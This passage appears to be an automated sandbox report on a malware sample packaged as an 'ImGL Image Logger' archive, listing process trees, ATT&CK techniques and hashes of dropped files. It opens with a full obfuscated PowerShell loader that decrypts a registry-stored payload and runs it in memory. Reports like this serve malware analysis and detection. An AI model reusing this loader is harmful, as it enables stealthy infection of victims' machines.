"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:404

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ImGL Image Logger\ImGL Image Logger\elitelogger.jpg" /ForceBootstrapPaint3D
1⤵
PID:5400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
PID:4836

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2144

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
aaeb1f5e097ab38083674077b84b8ed6

SHA1
7d9191cb2277c30f1147c9d29d75fc8e6aa0a4f2

SHA256
1654b27bfaeee49bfe56e0c4c0303418f4887f3ea1933f03cafce10352321aef

SHA512
130f1b62134626959f69b13e33c42c3182e343d7f0a5b6291f7bb0c2f64b60885f5e6331e1866a4944e9b7b2e49fe798e073316fde23927ede2c348ba0e56eda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1db53baf44edd6b1bc2b7576e2f01e12

SHA1
e35739fa87978775dcb3d8df5c8d2063631fa8df

SHA256
0d73ba3eea4c552ce3ffa767e4cd5fff4e459e543756987ab5d55f1e6d963f48

SHA512
84f544858803ac14bac962d2df1dbc7ed6e1134ecf16d242d7ee7316648b56b5bc095241363837bf0bf0afd16ca7deebe7afb7d40057604acbf09821fd5a9912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
48B

MD5
7f7ceef4fce417f00c57af3825e5c960

SHA1
be786da98e07006a6caaf2596177b6a43ba4bb59

SHA256
7617af5a4583260450d41bb03a19f31cbd4543a511c6418a6436bf4f823e73d7

SHA512
1cbd4a0225eef54e8da2a8aeb4c1a026be765326586a9a68050375c361347196b53f22bb7a84b5acec3a248e0a8ca27b62e77ce4687f982450d6eb56ef79db31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
d10c0734d9d5aa50642f71ebc961d001

SHA1
3b67bb2c4b58b46d082348b1bd49cbbaf9007782

SHA256
a17c2188eec24d7f7bf1deeafbeb8d46572324d83f7b963454cc9b327a18b706

SHA512
a45528e7c4b781814bd5c31f874f64d4d23d7e0884a78e2d7fc45f387b5e9e98ee7bdfe0907dba066f1f22a44db534bc27c1702ef1133a334491eb6fb53224d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
e7c16679f9a9ee3492c298bce782c992

SHA1
e56ce885ac92291ea4dcb3ca683784eadb797851

SHA256
d5a7882581bf3d0ba1f7f76e8728d73b4345b1ab5b28c589b84d2b6df0db7f8f

SHA512
d478f393dcc0ab82aac805e9b4a6b1e5b4392fb6e641e1f47f5b4525f36779ddc8bfc6e642f2f9a220217d6564e472daec42505873644bd6ef2d3ded6f116bea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
10KB

MD5
d2ff74a41423eaa5e88b01a412e11339

SHA1
2dc15224edd035c75270ce086232f25a27a366b3

SHA256
34973f069c3f1d0f01ac6fe0f12c86490bd44afc012f0f70f9ba2e76b18d7c1d

SHA512
61504348c8abedfc49f99df19a2bb8a4d3d8a9815ccda3171965ee7de3adbb6e0a8acd0af94ea5b2fb7b525816dfc82b2aeb60a96730f3e902e4d6bfb851faae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
25c4217694dd3971ea91575f5a1a8739

SHA1
5dd203573e6d426b2a3987160c47d4287d788785

SHA256
2cb3ee9f8831897f0595d1293998113d17c68ab2456ebd80e5a82d7c67a5f7b7

SHA512
84d72c242414da2563cf92e623fe7ea3d8f0dd6460445d9b40aba5663c55f725d9f1f9c262304ead1e2f1bbe83d4845c27f28997aa3da111dd5c30343bd27f40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
3718e6bab21e6d24b05761a218ab9c40

SHA1
bce05b19cbd14074d2d7d37be950565ca422f874

SHA256
b1b96899e2738ea2bf19e08534cd78baec44c5ea069589dbdcf071e1a6690b8e

SHA512
2aa232b9647809f8917a67498b4a027e7f0bbf94776fe21a8053b3349a12597d45250d8c0840749a60029c25826c3a87bbe96ebee7f004a2b3a2e9813eba2a59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
13KB

MD5
26e81d868f62108a43a946095364d779

SHA1
5b37d5ce474ff027f7e830db11dc4606393a4a4b

SHA256
dd1c4274f42ffc3c864c1c04414ebc16cb32eb6b0d92794682aff6c4a7a2ef23

SHA512
d888d86f8bbbced705b07bb4584e5319a8c4714a6acbace59f3bd44bef2c97767090f5a53194d7c10c5dcf137efc32ff6c7bd0e365ee47d95a0e7c697bbd79b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
47e94a96372e6f095b8a3fd7edc48ec0

SHA1
377b68f34e5964ca8be1b1b0c1507dd7f0e5f005

SHA256
15c77bafd922bd085317fd544d0fa129e3b8c814e3ba0d48936366004427732e

SHA512
5bd63de2e831805b723d7ddf1343c3b721ef5b757d9ab01bf8554ef8e29ac2cc09fa104fc85d530f27d66b67280774b3ebbef6729ea3ab61ce8028ab4ba5bdad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
4e52b9f53bbc82ef58737257863d6798

SHA1
0b91e71397014583b9905cbc7e725081256a1f41

SHA256
48f057f638e0f36862d5760c052df0691164c4db82cca3968badebf2155ea480

SHA512
89e01146fd5aa5118cf9820756912880d2ed7693b30c1649cdb69ad05f6a18e00b066703b7338d253c7d7f6e61dc169e2768958822132ade5ac91dba21f0be0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
99aa4fba7aca53be8e21f2e095cb4674

SHA1
8b6a8d26dd0727e9ccefb855a0c23448a8df0000

SHA256
c0c2f98fa199bfd8358bbdbf2a05b2be5569d0de589c1c277fa0f64c238ed910

SHA512
402a6ce26992f0625ddc513f3e1bb0623efcc5a6a399b8f8c319eec53cfc393551d39a9f48c20c134bde4a0e5ced6f35c3a9bdd09cfd94c9fc9ca064f29aa411

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
0b8171945165f0ffbe980a5c2c22ff35

SHA1
91fece00d59fd99947e6d750638db5b3b1a9806f

SHA256
9edda936c73a1bc99a733721a81b08d8eb55e98bd9527b160af24e41233973ee

SHA512
0914e81ee4ac4d3c399c9bf8028b4323255ab0bc54f2a2d7c37b3867a1e5af8e5f9eaf0ee1c3572e3876314b1b0887584b67631bba83e06534dad5a2fbfac0ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbkefomw.ydz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat
Filesize
11.6MB

MD5
a4ab58b4195e5696082165a704bb0b62

SHA1
7ac4eefc27f236f4f0cc5d30c6f5e59921674722

SHA256
c1fc31bf1f1669b48dece9951f2b895f75ce0e1dd3e516c02d4624ff7c60e6e3

SHA512
67891ced4353c3b7c86f2ec2a5652fe195467e309c1d02f0c5d91e56b7cd592906b6cfe3cbdeef7f228b4b021abe5effd45a63916aa799acd7d56ef7d60ae239

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3a0b3fc-606d-4f23-969e-c5623422c614.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll
Filesize
3.0MB

MD5
e3bd88b3c3e9b33dfa72c814f8826cff

SHA1
6d220c9eb7ee695f2b9dec261941bed59cac15e4

SHA256
28e9458a43e5d86a341590eaa83d0da18c29fce81f2383d84bda484e049a1796

SHA512
fcb7e384b5bda0f810c4b6190a991bd066eedfc8fc97af9837cda1ba480385c8bc09bd703c1029f9d8d8a3eea3dbc03af97b014b4713a4ceea6ad6ae85b3b6e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll
Filesize
3.0MB

MD5
e3bd88b3c3e9b33dfa72c814f8826cff

SHA1
6d220c9eb7ee695f2b9dec261941bed59cac15e4

SHA256
28e9458a43e5d86a341590eaa83d0da18c29fce81f2383d84bda484e049a1796

SHA512
fcb7e384b5bda0f810c4b6190a991bd066eedfc8fc97af9837cda1ba480385c8bc09bd703c1029f9d8d8a3eea3dbc03af97b014b4713a4ceea6ad6ae85b3b6e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
6309b3abe3101f02e36712ae864219a2

SHA1
7a32b84845f7688d3253280c763f4c5bd5e0f75d

SHA256
96ee11f0d767d434be8b5aed2c774f1e13f9e2260a4b07fab8b2492ac86a5e17

SHA512
befdd0dca63572cdc23146d9029835b7cfd94759ca420e0396584d1dded476887616af2446e4795f27cdb58f6bb6cc53955ed02d0ec9cc52c06cc91c7172b279

Download Submit
C:\Users\Admin\Downloads\ImGL Image Logger.zip
Filesize
17.1MB

MD5
5c1451df0c87ebaa384f5adda3809a57

SHA1
87c64026bbc372d7521ea9dc5ce066e51c12c317

SHA256
087e88d532c6abe672a282f081e87d8c8d4cc20fcd34efbd2ce093d44b7fae7f

SHA512
cf1497b7cd33d7704221d808adacadc14e0cfd1317266ec4003481bc4033bdd87ba5526e2438dac24d2a3424efd32d44a130b3adc3cbf1c1375f3a1d9d7b551b

Download Submit
C:\Users\Admin\Downloads\ImGL Image Logger\ImGL Image Logger\elitelogger.jpg
Filesize
678KB

MD5
9449f610fc68fa83ed48e029d92b6d30

SHA1
f0fae413026d9d0b52722bf075509eed572a491f

SHA256
1cb49994b67b23f2ebfd5a3a6ed0bcd79fc40af5c6752090dcfed9a6047c854f

SHA512
ebda85e78405784ffe56e30162b3aeb30643c20216356ec9fa0cf373079ecbcb05853776abc266958af84dd6d79e7602e6607a253f0898fe62b03af28c9f9d3d

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
